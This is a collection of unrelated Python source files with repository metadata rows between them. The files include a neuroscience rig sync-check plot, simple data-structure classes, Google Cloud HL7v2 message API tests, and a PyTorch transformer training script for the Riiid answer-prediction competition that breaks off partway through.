print(' ... OK')
outputFilePath = os.path.join(outputPath, staticMechanismsFile)
print('[ActivityScriptExporter, StaticMechanisms]:', fullpath, '-->', outputFilePath, end=' ')
f = open(outputFilePath, 'wb')
f.write('data = ')
f.write(repr(staticMechanisms))
f.write('\n_reload_all = True\n')
f.close()
# NOTE: 编辑器调用,用于验证数据并转换
def editor_validate_and_export(defData, editorData, filename, resPath):
typeErrors = []
noneValueErrors = []
unknownErrors = []
result = {
"errors": {
"TypeErrors": typeErrors,
"NullValueError": noneValueErrors,
"UnknownErrors": unknownErrors
},
"result": None
}
try:
result['result'] = single_file_export(defData, editorData, True, filename)
except NoneValueError as e:
noneValueErrors.append({
'id': e.nodeID,
'subItemId': e.argTypeID,
'message': e.message
})
except TypeMismatchError as e:
typeErrors.append({
'id': e.nodeID,
'subItemId': e.argTypeID,
'message': e.message
})
except Exception as e:
unknownErrors.append(e)
return result
# if __name__ == '__main__':
# import sys
# import os
# import json
#
# if len(sys.argv) == 4:
# nodeDefFilepath = sys.argv[1]
# editorFilepath = sys.argv[2]
# resPath = sys.argv[3]
#
# defData = json.loads(open(nodeDefFilepath, 'r').read())
# editorData = json.loads(open(editorFilepath, 'r').read())
#
# result = single_file_export(defData, editorData, False, os.path.basename(nodeDefFilepath).split('.')[0],
# resPath)
#
# print('data = ', end=' ')
# print(repr(result))
#
# elif len(sys.argv) == 5:
# multi_file_export_mode()
# else:
# nodeDefFilepath = 'E:\\PycharmProjects\\crawler\\editor\meta\\nodes.json'
# editorFilepath = 'E:\\PycharmProjects\\crawler\\editor\\graph\\temp.json'
# # resPath = 'F:/H43/trunk/Client_Resources/res'
# defData = json.loads(open(nodeDefFilepath, 'r').read())
# editorData = json.loads(open(editorFilepath, 'r').read())
#
# # scriptType = guess_script_type(editorFilepath, editorData)
#
# result = single_file_export(defData, editorData, False, os.path.basename(nodeDefFilepath).split('.')[0])
#
# print('data = ', end=' ')
# print(repr(result))
# # raise NotImplementedError("wrong args")
#
# sys.exit(0)
| [
"[email protected]"
] | |
6a75e330e912ea0b671c833906e68358aec70daf | 1cc54e191b9d6e4ea2a469b92da0f3ac8ccd84b0 | /tasks/post_session_check_sync_pulses.py | 435b760d75571b766963aac6ffca53126fef9006 | [
"MIT"
] | permissive | alejandropan/iblrig | 027c090dbe54b6ef2cbbf22c16ad60eb040ee949 | d8e746ccc52c2ad325404077ad2403e165e94d0c | refs/heads/master | 2020-04-28T11:45:36.182150 | 2019-06-12T01:38:06 | 2019-06-12T01:38:06 | 175,253,494 | 0 | 0 | MIT | 2019-05-28T01:34:28 | 2019-03-12T16:25:04 | Python | UTF-8 | Python | false | false | 2,085 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Niccolò Bonacchi
# @Date: Thursday, February 21st 2019, 7:13:37 pm
from pathlib import Path
import ibllib.io.raw_data_loaders as raw
import matplotlib.pyplot as plt
import numpy as np
import sys
def get_port_events(events: dict, name: str = '') -> list:
out: list = []
for k in events:
if name in k:
out.extend(events[k])
out = sorted(out)
return out
if __name__ == '__main__':
if len(sys.argv) == 1:
print("I need a file name...")
session_data_file = Path(sys.argv[1])
if not session_data_file.exists():
raise (FileNotFoundError)
if session_data_file.name.endswith('.jsonable'):
data = raw.load_data(session_data_file.parent.parent)
else:
try:
data = raw.load_data(session_data_file)
except Exception:
print('Not a file or a valid session folder')
unsynced_trial_count = 0
frame2ttl = []
sound = []
camera = []
trial_end = []
for trial_data in data:
tevents = trial_data['behavior_data']['Events timestamps']
ev_bnc1 = get_port_events(tevents, name='BNC1')
ev_bnc2 = get_port_events(tevents, name='BNC2')
ev_port1 = get_port_events(tevents, name='Port1')
if not ev_bnc1 or not ev_bnc2 or not ev_port1:
unsynced_trial_count += 1
frame2ttl.extend(ev_bnc1)
sound.extend(ev_bnc2)
camera.extend(ev_port1)
trial_end.append(trial_data['behavior_data']['Trial end timestamp'])
print(f'Found {unsynced_trial_count} trials with bad sync data')
f = plt.figure() # figsize=(19.2, 10.8), dpi=100)
ax = plt.subplot2grid((1, 1), (0, 0), rowspan=1, colspan=1)
ax.plot(camera, np.ones(len(camera)) * 1, '|')
ax.plot(sound, np.ones(len(sound)) * 2, '|')
ax.plot(frame2ttl, np.ones(len(frame2ttl)) * 3, '|')
[ax.axvline(t, alpha=0.5) for t in trial_end]
ax.set_ylim([0, 4])
ax.set_yticks(range(4))
ax.set_yticklabels(['', 'camera', 'sound', 'frame2ttl'])
plt.show()
| [
"[email protected]"
] | |
7e7e0400ffe2834140e94109ce4329b16205fa98 | 3034e86347c71bf7e7af9e5f7aa44ab5ad61e14b | /pbase/day18/classMyList.py | 814391481cac5af7082c88e154e183db16732870 | [] | no_license | jason12360/AID1803 | bda039b82f43d6609aa8028b0d9598f2037c23d5 | f0c54a3a2f06881b3523fba7501ab085cceae75d | refs/heads/master | 2020-03-17T00:43:42.541761 | 2018-06-29T10:07:44 | 2018-06-29T10:07:44 | 133,127,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | class Mylist(list):
def insert_head(self,element):
self[0:0] = [element]
L = Mylist(range(5))
L.insert_head(-1)
print(L)
| [
"[email protected]"
] | |
ae28b288e8588b7a164a13119aebe56843af8a10 | 89a90707983bdd1ae253f7c59cd4b7543c9eda7e | /programming_python/Dstruct/OldIntro/stack3.py | e1a2711fb805383ddc41021d2bab73940be3a07f | [] | no_license | timothyshull/python_reference_code | 692a7c29608cadfd46a6cc409a000023e95b9458 | f3e2205dd070fd3210316f5f470d371950945028 | refs/heads/master | 2021-01-22T20:44:07.018811 | 2017-03-17T19:17:22 | 2017-03-17T19:17:22 | 85,346,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | class Stack:
def __init__(self):
self.stack = [] # initialize list
def push(self, object):
self.stack.append(object) # change in-place
def pop(self):
top = self.stack[-1] # top = end
del self.stack[-1] # delete in-place
return top
def empty(self):
return not self.stack
| [
"[email protected]"
] | |
af15bb2708ac33286e3cd7ea1907e886af99d6d6 | 127fa3dd454434b4c7526afe161177af2e10226e | /2018校招真题/网易 操作序列.py | bfda124710b7fbdb1440fc50027fa803d3ac8b78 | [] | no_license | lunar-r/sword-to-offer-python | 966c46a8ddcff8ce5c95697638c988d83da3beab | fab4c341486e872fb2926d1b6d50499d55e76a4a | refs/heads/master | 2023-04-18T18:57:12.126441 | 2020-11-29T09:51:23 | 2020-11-29T09:51:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | # -*- coding: utf-8 -*-
"""
File Name: 网易 操作序列
Description :
Author : simon
date: 19-4-9
"""
def helper(nums):
if nums == [1]:
return [1]
return [nums[-1]] + helper(nums[:-1])[::-1]
"""
找规律 [nums[-1], nums[-3], ...., nums[-4],nums[-2]]
"""
def helper2(nums):
nums = nums[::-1]
res = ['*'] * len(nums)
N = len(nums)
if len(nums) % 2:
res[len(nums) // 2] = nums[-1]
q = 0
for i in range(len(nums)//2):
res[i] = nums[q]
res[N-1-i] = nums[q+1]
q += 2
return res
"""
发现的另外一种规律
"""
n = int(input().strip())
a = input().strip().split()
b = []
if n % 2 == 0:
b.extend(a[1::2][::-1])
b.extend(a[::2])
else:
b.extend(a[::2][::-1])
b.extend(a[1::2])
print(' '.join(b))
if __name__ == '__main__':
_ = input()
nums = input().strip().split(' ')
# nums = list(map(int, nums))
res = helper2(nums)
# res = list(map(str, res))
print(' '.join(res))
| [
"[email protected]"
] | |
a41a3904dfdcdee0e727b00a0ec2e8dfc1657f97 | 173e0aed80b0d0c01252dd2891be6967f60ce008 | /healthcare/api-client/v1/hl7v2/hl7v2_messages_test.py | 06ae20b41a350c427386f1d25cb88cd42f6f9ec2 | [
"Apache-2.0"
] | permissive | yuriatgoogle/python-docs-samples | a59298504c73d7f272637b033662d920dfcc314b | 9fb1bf82b447e920fe9b80564cc110d1e50f43ab | refs/heads/master | 2023-04-08T03:36:18.691386 | 2021-02-28T17:17:57 | 2021-02-28T17:17:57 | 337,138,011 | 1 | 0 | Apache-2.0 | 2021-02-28T17:17:58 | 2021-02-08T16:30:52 | Python | UTF-8 | Python | false | false | 7,415 | py | # Copyright 2018 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import uuid
import backoff
from googleapiclient.errors import HttpError
import pytest
# Add datasets for bootstrapping datasets for testing
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "datasets")) # noqa
import datasets # noqa
import hl7v2_messages # noqa
import hl7v2_stores # noqa
cloud_region = "us-central1"
project_id = os.environ["GOOGLE_CLOUD_PROJECT"]
dataset_id = "test_dataset_{}".format(uuid.uuid4())
hl7v2_store_id = "test_hl7v2_store-{}".format(uuid.uuid4())
hl7v2_message_file = "resources/hl7-sample-ingest.json"
label_key = "PROCESSED"
label_value = "TRUE"
@pytest.fixture(scope="module")
def test_dataset():
@backoff.on_exception(backoff.expo, HttpError, max_time=60)
def create():
try:
datasets.create_dataset(project_id, cloud_region, dataset_id)
except HttpError as err:
# We ignore 409 conflict here, because we know it's most
# likely the first request failed on the client side, but
# the creation suceeded on the server side.
if err.resp.status == 409:
print("Got exception {} while creating dataset".format(err.resp.status))
else:
raise
create()
yield
# Clean up
@backoff.on_exception(backoff.expo, HttpError, max_time=60)
def clean_up():
try:
datasets.delete_dataset(project_id, cloud_region, dataset_id)
except HttpError as err:
# The API returns 403 when the dataset doesn't exist.
if err.resp.status == 404 or err.resp.status == 403:
print("Got exception {} while deleting dataset".format(err.resp.status))
else:
raise
clean_up()
@pytest.fixture(scope="module")
def test_hl7v2_store():
@backoff.on_exception(backoff.expo, HttpError, max_time=60)
def create():
try:
hl7v2_stores.create_hl7v2_store(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
except HttpError as err:
# We ignore 409 conflict here, because we know it's most
# likely the first request failed on the client side, but
# the creation suceeded on the server side.
if err.resp.status == 409:
print(
"Got exception {} while creating HL7v2 store".format(
err.resp.status
)
)
else:
raise
create()
yield
# Clean up
@backoff.on_exception(backoff.expo, HttpError, max_time=60)
def clean_up():
try:
hl7v2_stores.delete_hl7v2_store(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
except HttpError as err:
# The API returns 403 when the HL7v2 store doesn't exist.
if err.resp.status == 404 or err.resp.status == 403:
print(
"Got exception {} while deleting HL7v2 store".format(
err.resp.status
)
)
else:
raise
clean_up()
def test_CRUD_hl7v2_message(test_dataset, test_hl7v2_store, capsys):
hl7v2_messages.create_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_file
)
@backoff.on_exception(backoff.expo, AssertionError, max_time=60)
def run_eventually_consistent_test():
hl7v2_messages_list = hl7v2_messages.list_hl7v2_messages(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
assert len(hl7v2_messages_list) > 0
hl7v2_message_name = hl7v2_messages_list[0].get("name")
elms = hl7v2_message_name.split("/", 9)
assert len(elms) >= 10
hl7v2_message_id = elms[9]
return hl7v2_message_id
hl7v2_message_id = run_eventually_consistent_test()
hl7v2_messages.get_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
hl7v2_messages.delete_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
out, _ = capsys.readouterr()
# Check that create/get/list/delete worked
assert "Created HL7v2 message" in out
assert "Name" in out
assert "Deleted HL7v2 message" in out
def test_ingest_hl7v2_message(test_dataset, test_hl7v2_store, capsys):
hl7v2_messages.ingest_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_file
)
@backoff.on_exception(backoff.expo, AssertionError, max_time=60)
def run_eventually_consistent_test():
hl7v2_messages_list = hl7v2_messages.list_hl7v2_messages(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
assert len(hl7v2_messages_list) > 0
hl7v2_message_name = hl7v2_messages_list[0].get("name")
elms = hl7v2_message_name.split("/", 9)
assert len(elms) >= 10
hl7v2_message_id = elms[9]
return hl7v2_message_id
hl7v2_message_id = run_eventually_consistent_test()
hl7v2_messages.get_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
hl7v2_messages.delete_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
out, _ = capsys.readouterr()
# Check that ingest/get/list/delete worked
assert "Ingested HL7v2 message" in out
assert "Name" in out
assert "Deleted HL7v2 message" in out
def test_patch_hl7v2_message(test_dataset, test_hl7v2_store, capsys):
hl7v2_messages.create_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_file
)
@backoff.on_exception(backoff.expo, (AssertionError, HttpError), max_time=60)
def run_eventually_consistent_test():
hl7v2_messages_list = hl7v2_messages.list_hl7v2_messages(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
assert len(hl7v2_messages_list) > 0
hl7v2_message_name = hl7v2_messages_list[0].get("name")
elms = hl7v2_message_name.split("/", 9)
assert len(elms) >= 10
hl7v2_message_id = elms[9]
return hl7v2_message_id
hl7v2_message_id = run_eventually_consistent_test()
hl7v2_messages.patch_hl7v2_message(
project_id,
cloud_region,
dataset_id,
hl7v2_store_id,
hl7v2_message_id,
label_key,
label_value,
)
hl7v2_messages.delete_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
out, _ = capsys.readouterr()
# Check that patch worked
assert "Patched HL7v2 message" in out
| [
"[email protected]"
] | |
156fd1f615108a6a975110457e3f01ee5b5a7ca9 | c858d9511cdb6a6ca723cd2dd05827d281fa764d | /MFTU/lesson 2/practice_robot/robot-tasks-master/task_25.py | ed88ac2f39e4be1dd10bd7d1af830ef72db2fa21 | [] | no_license | DontTouchMyMind/education | 0c904aa929cb5349d7af7e06d9b1bbaab972ef95 | 32a53eb4086b730cc116e633f68cf01f3d4ec1d1 | refs/heads/master | 2021-03-12T11:15:02.479779 | 2020-09-17T08:19:50 | 2020-09-17T08:19:50 | 246,616,542 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | #!/usr/bin/python3
from pyrob.api import *
@task
def task_2_2():
def chest():
fill_cell()
move_right()
fill_cell()
move_right()
fill_cell()
move_down()
move_left()
fill_cell()
move_up()
move_up()
fill_cell()
move_down(2)
chest()
for i in range(4):
move_right(3)
move_down()
chest()
move_left()
if __name__ == '__main__':
run_tasks()
| [
"[email protected]"
] | |
5d9db594141e523299b132bb63b29929f1a35ebe | aeb2f0bb7b01f87a1b6c65b88b216bed47025fe5 | /experiment/model225_3.py | 89d3aacb28fc16f8f206203bc05a981c353f8a0e | [] | no_license | kurupical/riiid | 7e68239cd50243fbb734bf433d60ebd7469cb180 | 7bab580ce03d03873748a6afc91092c11871465f | refs/heads/master | 2023-03-30T04:15:54.109815 | 2021-04-04T01:20:33 | 2021-04-04T01:20:33 | 302,828,112 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 27,225 | py | import numpy as np
import pandas as pd
import gc
import random
from tqdm import tqdm
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
import seaborn as sns
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.nn.utils.rnn as rnn_utils
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
from datetime import datetime as dt
import os
import glob
import pickle
import json
from feature_engineering.feature_factory_for_transformer import FeatureFactoryForTransformer
from feature_engineering.feature_factory import \
FeatureFactoryManager, \
DurationPreviousContent, \
ElapsedTimeBinningEncoder, \
UserContentRateEncoder, \
QuestionQuestionTableEncoder2, \
PreviousAnswer2, \
StudyTermEncoder2, \
MeanAggregator, \
ElapsedTimeMeanByContentIdEncoder, \
DurationFeaturePostProcess
from experiment.common import get_logger
import time
from transformers import AdamW, get_linear_schedule_with_warmup
torch.manual_seed(0)
np.random.seed(0)
is_debug = False
is_make_feature_factory = False
load_pickle = True
epochs = 12
device = torch.device("cuda")
wait_time = 0
class SAKTDataset(Dataset):
def __init__(self, group, n_skill, n_part=8, max_seq=100, is_test=False, predict_mode=False):
super(SAKTDataset, self).__init__()
self.max_seq = max_seq
self.n_skill = n_skill
self.samples = group
self.is_test = is_test
self.n_part = n_part
self.predict_mode = predict_mode
self.user_ids = []
for user_id in group.keys():
q = group[user_id][("content_id", "content_type_id")]
if not is_test:
self.user_ids.append([user_id, -1])
else:
is_val = group[user_id]["is_val"]
for i in range(len(q)):
if is_val[i]:
self.user_ids.append([user_id, i+1])
def __len__(self):
return len(self.user_ids)
def __getitem__(self, index):
user_id = self.user_ids[index][0]
end = self.user_ids[index][1]
# =============================
# setting index
# =============================
idx_dict = {
("content_id", "content_type_id"): 0,
"user_answer": 1,
"part": 2,
"prior_question_elapsed_time_bin300": 3,
"duration_previous_content_bin300": 4,
"answered_correctly": 5,
"prior_question_had_explanation": 6,
"rating_diff_content_user_id": 7,
"task_container_id_bin300": 8,
"previous_answer_index_content_id": 9,
"previous_answer_content_id": 10,
"timediff-elapsedtime_bin500": 11
}
num_sequence = len(idx_dict)
item_ary = np.zeros((num_sequence, self.max_seq), dtype=np.float32)
data_length = len(self.samples[user_id][("content_id", "content_type_id")])
if self.is_test:
start = np.max([0, end - self.max_seq])
else:
start = 0
end = data_length
seq_length = end - start
for item_name, idx in idx_dict.items():
item_ary[idx, -seq_length:] = self.samples[user_id][item_name][start:end]
def get_data(key, remove_now=False):
if remove_now:
return item_ary[idx_dict[key], :][:-1]
else:
return item_ary[idx_dict[key], :][1:]
return {
"x": get_data(key="answered_correctly", remove_now=True) + 2, # 1: lecture, 2: not correct, 3: correct
"user_answer": get_data(key="user_answer", remove_now=True) + 1,
"target_id": get_data(key=("content_id", "content_type_id")),
"part": get_data(key="part"),
"elapsed_time": get_data(key="prior_question_elapsed_time_bin300"),
"duration_previous_content": get_data(key="duration_previous_content_bin300"),
"label": get_data(key="answered_correctly"),
"prior_q": get_data(key="prior_question_had_explanation"),
"rate_diff": get_data(key="rating_diff_content_user_id"),
"container_id": get_data(key="task_container_id_bin300"),
"previous_answer_index_content_id": get_data(key="previous_answer_index_content_id"),
"previous_answer_content_id": get_data(key="previous_answer_content_id"),
"timediff-elapsedtime_bin500": get_data(key="timediff-elapsedtime_bin500"),
"prior_content_id": get_data(key=("content_id", "content_type_id"), remove_now=True)
}
class FFN(nn.Module):
def __init__(self, state_size=200):
super(FFN, self).__init__()
self.state_size = state_size
self.lr1 = nn.Linear(state_size, state_size)
self.ln1 = nn.LayerNorm(state_size)
self.relu = nn.ReLU()
self.lr2 = nn.Linear(state_size, state_size)
self.ln2 = nn.LayerNorm(state_size)
def forward(self, x):
x = self.lr1(x)
x = self.ln1(x)
x = self.relu(x)
x = self.lr2(x)
x = self.ln2(x)
return x
class ContEmbedding(nn.Module):
def __init__(self, input_dim, embed_dim, seq_len):
super(ContEmbedding, self).__init__()
self.embed_dim = embed_dim
self.bn = nn.BatchNorm1d(seq_len-1)
self.gru = nn.GRU(input_size=input_dim, hidden_size=embed_dim // 2)
self.ln2 = nn.LayerNorm(embed_dim // 2)
def forward(self, x):
x = self.bn(x)
x, _ = self.gru(x)
x = self.ln2(x)
return x
def future_mask(seq_length):
future_mask = np.triu(np.ones((seq_length, seq_length)), k=1).astype('bool')
return torch.from_numpy(future_mask)
class CatEmbedding(nn.Module):
def __init__(self, embed_dim):
super(CatEmbedding, self).__init__()
self.embed_dim = embed_dim
self.ln1 = nn.LayerNorm(embed_dim)
self.gru = nn.GRU(input_size=embed_dim, hidden_size=embed_dim // 2)
self.ln2 = nn.LayerNorm(embed_dim // 2)
def forward(self, x):
x = self.ln1(x)
x, _ = self.gru(x)
x = self.ln2(x)
return x
class ContEmbedding(nn.Module):
def __init__(self, input_dim, embed_dim, seq_len):
super(ContEmbedding, self).__init__()
self.embed_dim = embed_dim
self.bn = nn.BatchNorm1d(seq_len-1)
self.gru = nn.GRU(input_size=input_dim, hidden_size=embed_dim)
self.ln2 = nn.LayerNorm(embed_dim)
def forward(self, x):
x = self.bn(x)
x, _ = self.gru(x)
x = self.ln2(x)
return x
class SAKTModel(nn.Module):
def __init__(self, n_skill, max_seq=100, embed_dim=128, num_heads=8, dropout=0.2,
cont_emb=None):
super(SAKTModel, self).__init__()
self.n_skill = n_skill
self.embed_dim_cat = embed_dim
embed_dim_small_cat = 32
embed_dim_middle_cat = 32
embed_dim_cat_all = embed_dim_small_cat*5 + embed_dim_middle_cat*5 + embed_dim
embed_dim_all = embed_dim_cat_all + cont_emb
self.embedding = nn.Embedding(4, embed_dim_small_cat)
self.user_answer_embedding = nn.Embedding(6, self.embed_dim_cat)
self.prior_question_had_explanation_embedding = nn.Embedding(4, embed_dim_small_cat)
self.e_embedding = nn.Embedding(n_skill + 1, self.embed_dim_cat)
self.part_embedding = nn.Embedding(8, embed_dim_small_cat)
self.elapsed_time_embedding = nn.Embedding(302, embed_dim_middle_cat)
self.duration_previous_content_embedding = nn.Embedding(302, embed_dim_middle_cat)
self.container_embedding = nn.Embedding(302, embed_dim_middle_cat)
self.prev_ans_idx_embedding = nn.Embedding(302, embed_dim_middle_cat)
self.prev_ans_content_id_embedding = nn.Embedding(4, embed_dim_small_cat)
self.timediff_elapsedtime_embedding = nn.Embedding(502, embed_dim_middle_cat)
encoder_layer = nn.TransformerEncoderLayer(d_model=embed_dim_all, nhead=num_heads, dropout=dropout)
self.transformer_enc = nn.TransformerEncoder(encoder_layer=encoder_layer, num_layers=4)
self.gru = nn.GRU(input_size=embed_dim_all, hidden_size=embed_dim_all)
self.continuous_embedding = ContEmbedding(input_dim=1, embed_dim=cont_emb, seq_len=max_seq)
self.prior_content_embedding = nn.Sequential(
nn.Linear(self.embed_dim_cat, embed_dim_small_cat),
nn.LayerNorm(embed_dim_small_cat)
)
self.cat_embedding = nn.Sequential(
nn.Linear(embed_dim_cat_all, embed_dim_cat_all),
nn.LayerNorm(embed_dim_cat_all)
)
self.layer_normal = nn.LayerNorm(embed_dim_all)
self.ffn = FFN(embed_dim_all)
self.dropout = nn.Dropout(dropout/2)
self.pred = nn.Linear(embed_dim_all, 1)
def forward(self, item, device):
x = item["x"].to(device).long()
question_ids = item["target_id"].to(device).long()
parts = item["part"].to(device).long()
label = item["label"].to(device).float()
elapsed_time = item["elapsed_time"].to(device).long()
duration_previous_content = item["duration_previous_content"].to(device).long()
prior_q = item["prior_q"].to(device).long()
user_answer = item["user_answer"].to(device).long()
rate_diff = item["rate_diff"].to(device).float()
container_id = item["container_id"].to(device).long()
prev_ans_idx = item["previous_answer_index_content_id"].to(device).long()
prior_content_id_ans_correctly = item["previous_answer_content_id"].to(device).long()
prior_content_id = item["prior_content_id"].to(device).long()
timediff_elapsedtime = item["timediff-elapsedtime_bin500"].to(device).long()
att_mask = future_mask(x.size(1)).to(device)
e = self.e_embedding(question_ids)
p = self.part_embedding(parts)
prior_q_emb = self.prior_question_had_explanation_embedding(prior_q)
user_answer_emb = self.user_answer_embedding(user_answer)
prior_content_id_emb = self.e_embedding(prior_content_id)
prior_content_user_answer_emb = self.prior_content_embedding(user_answer_emb + prior_content_id_emb)
timediff_elapsedtime_emb = self.timediff_elapsedtime_embedding(timediff_elapsedtime)
# decoder
x = self.embedding(x)
el_time_emb = self.elapsed_time_embedding(elapsed_time)
dur_emb = self.duration_previous_content_embedding(duration_previous_content)
container_emb = self.container_embedding(container_id)
prev_ans_idx_emb = self.prev_ans_idx_embedding(prev_ans_idx)
prev_ans_content_id_emb = self.prev_ans_content_id_embedding(prior_content_id_ans_correctly)
x = torch.cat([x, el_time_emb, dur_emb, e, p, prior_q_emb, container_emb,
prev_ans_idx_emb, prev_ans_content_id_emb,
prior_content_user_answer_emb,
timediff_elapsedtime_emb], dim=2)
cont = rate_diff
cont_emb = self.continuous_embedding(cont.view(x.size(0), x.size(1), -1))
x = self.cat_embedding(x)
x = torch.cat([x, cont_emb], dim=2)
x = x.permute(1, 0, 2) # x: [bs, s_len, embed] => [s_len, bs, embed]
att_dec = self.transformer_enc(x,
mask=att_mask)
att_dec, _ = self.gru(att_dec)
att_dec = att_dec.permute(1, 0, 2) # att_output: [s_len, bs, embed] => [bs, s_len, embed]
x = self.layer_normal(att_dec)
x = self.ffn(x) + att_dec
x = self.dropout(x)
x = self.pred(x)
return x.squeeze(-1)
def train_epoch(model, train_iterator, val_iterator, optim, criterion, scheduler, epoch, device="cuda"):
model.train()
train_loss = []
num_corrects = 0
num_total = 0
labels = []
outs = []
tbar = tqdm(train_iterator)
for item in tbar:
optim.zero_grad()
label = item["label"].to(device).float()
output = model(item, device)
target_idx = (label.view(-1) >= 0).nonzero()
loss = criterion(output.view(-1)[target_idx], label.view(-1)[target_idx])
loss.backward()
optim.step()
scheduler.step()
train_loss.append(loss.item())
output = output[:, -1]
label = label[:, -1]
target_idx = (label.view(-1) >= 0).nonzero()
pred = (torch.sigmoid(output) >= 0.5).long()
num_corrects += (pred.view(-1)[target_idx] == label.view(-1)[target_idx]).sum().item()
num_total += len(label)
labels.extend(label.view(-1)[target_idx].data.cpu().numpy())
outs.extend(output.view(-1)[target_idx].data.cpu().numpy())
tbar.set_description('loss - {:.4f}'.format(loss))
acc = num_corrects / num_total
auc = roc_auc_score(labels, outs)
loss = np.mean(train_loss)
preds = []
labels = []
model.eval()
i = 0
with torch.no_grad():
for item in tqdm(val_iterator):
label = item["label"].to(device).float()
output = model(item, device)
preds.extend(torch.nn.Sigmoid()(output[:, -1]).view(-1).data.cpu().numpy().tolist())
labels.extend(label[:, -1].view(-1).data.cpu().numpy())
i += 1
if i > 100 and epoch < 10:
break
auc_val = roc_auc_score(labels, preds)
return loss, acc, auc, auc_val
def main(params: dict,
output_dir: str):
import mlflow
print("start params={}".format(params))
model_id = "all"
logger = get_logger()
df = pd.read_pickle("../input/riiid-test-answer-prediction/train_merged.pickle")
# df = pd.read_pickle("../input/riiid-test-answer-prediction/split10/train_0.pickle").sort_values(["user_id", "timestamp"]).reset_index(drop=True)
if is_debug:
df = df.head(30000)
df["prior_question_had_explanation"] = df["prior_question_had_explanation"].fillna(-1)
# df["answered_correctly"] = df["answered_correctly"].replace(-1, np.nan)
column_config = {
("content_id", "content_type_id"): {"type": "category"},
"user_answer": {"type": "leakage_feature"},
"answered_correctly": {"type": "leakage_feature"},
"part": {"type": "category"},
"prior_question_elapsed_time_bin300": {"type": "category"},
"duration_previous_content_bin300": {"type": "category"},
"prior_question_had_explanation": {"type": "category"},
"rating_diff_content_user_id": {"type": "numeric"},
"task_container_id_bin300": {"type": "category"},
"previous_answer_index_content_id": {"type": "category"},
"previous_answer_content_id": {"type": "category"},
"timediff-elapsedtime_bin500": {"type": "category"}
}
if not load_pickle or is_debug:
feature_factory_dict = {"user_id": {}}
feature_factory_dict["user_id"]["DurationPreviousContent"] = DurationPreviousContent(is_partial_fit=True)
feature_factory_dict["user_id"]["ElapsedTimeBinningEncoder"] = ElapsedTimeBinningEncoder()
feature_factory_dict["user_id"]["UserContentRateEncoder"] = UserContentRateEncoder(rate_func="elo",
column="user_id")
feature_factory_dict["user_id"]["PreviousAnswer2"] = PreviousAnswer2(groupby="user_id",
column="content_id",
is_debug=is_debug,
model_id=model_id,
n=300)
feature_factory_dict["user_id"]["StudyTermEncoder2"] = StudyTermEncoder2(is_partial_fit=True)
feature_factory_dict["user_id"][f"MeanAggregatorStudyTimebyUserId"] = MeanAggregator(column="user_id",
agg_column="study_time",
remove_now=False)
feature_factory_dict["user_id"]["ElapsedTimeMeanByContentIdEncoder"] = ElapsedTimeMeanByContentIdEncoder()
feature_factory_dict["post"] = {
"DurationFeaturePostProcess": DurationFeaturePostProcess()
}
feature_factory_manager = FeatureFactoryManager(feature_factory_dict=feature_factory_dict,
logger=logger,
split_num=1,
model_id=model_id,
load_feature=not is_debug,
save_feature=not is_debug)
print("all_predict")
df = feature_factory_manager.all_predict(df)
def f(x):
x = x // 1000
if x < -90:
return -90
if x > 90:
return 90
return x
df["task_container_id_bin300"] = [x if x < 300 else 300 for x in df["task_container_id"]]
df["timediff-elapsedtime_bin500"] = [f(x) for x in df["timediff-elapsedtime"].values]
df = df[["user_id", "content_id", "content_type_id", "part", "user_answer", "answered_correctly",
"prior_question_elapsed_time_bin300", "duration_previous_content_bin300",
"prior_question_had_explanation", "rating_diff_content_user_id", "task_container_id_bin300",
"previous_answer_index_content_id", "previous_answer_content_id", "row_id",
"timediff-elapsedtime_bin500"]]
print(df.head(10))
print("data preprocess")
ff_for_transformer = FeatureFactoryForTransformer(column_config=column_config,
dict_path="../feature_engineering/",
sequence_length=params["max_seq"],
logger=logger)
ff_for_transformer.make_dict(df=df)
n_skill = len(ff_for_transformer.embbed_dict[("content_id", "content_type_id")])
if not load_pickle or is_debug:
df_val_row = pd.read_feather("../input/riiid-test-answer-prediction/train_transformer_last2500k_only_row_id.feather")
if is_debug:
df_val_row = df_val_row.head(3000)
df_val_row["is_val"] = 1
df = pd.merge(df, df_val_row, how="left", on="row_id")
df["is_val"] = df["is_val"].fillna(0)
print(df["is_val"].value_counts())
w_df = df[df["is_val"] == 0]
w_df["group"] = (w_df.groupby("user_id")["user_id"].transform("count") - w_df.groupby("user_id").cumcount()) // params["max_seq"]
w_df["user_id"] = w_df["user_id"].astype(str) + "_" + w_df["group"].astype(str)
group = ff_for_transformer.all_predict(w_df)
dataset_train = SAKTDataset(group,
n_skill=n_skill,
max_seq=params["max_seq"])
del w_df
gc.collect()
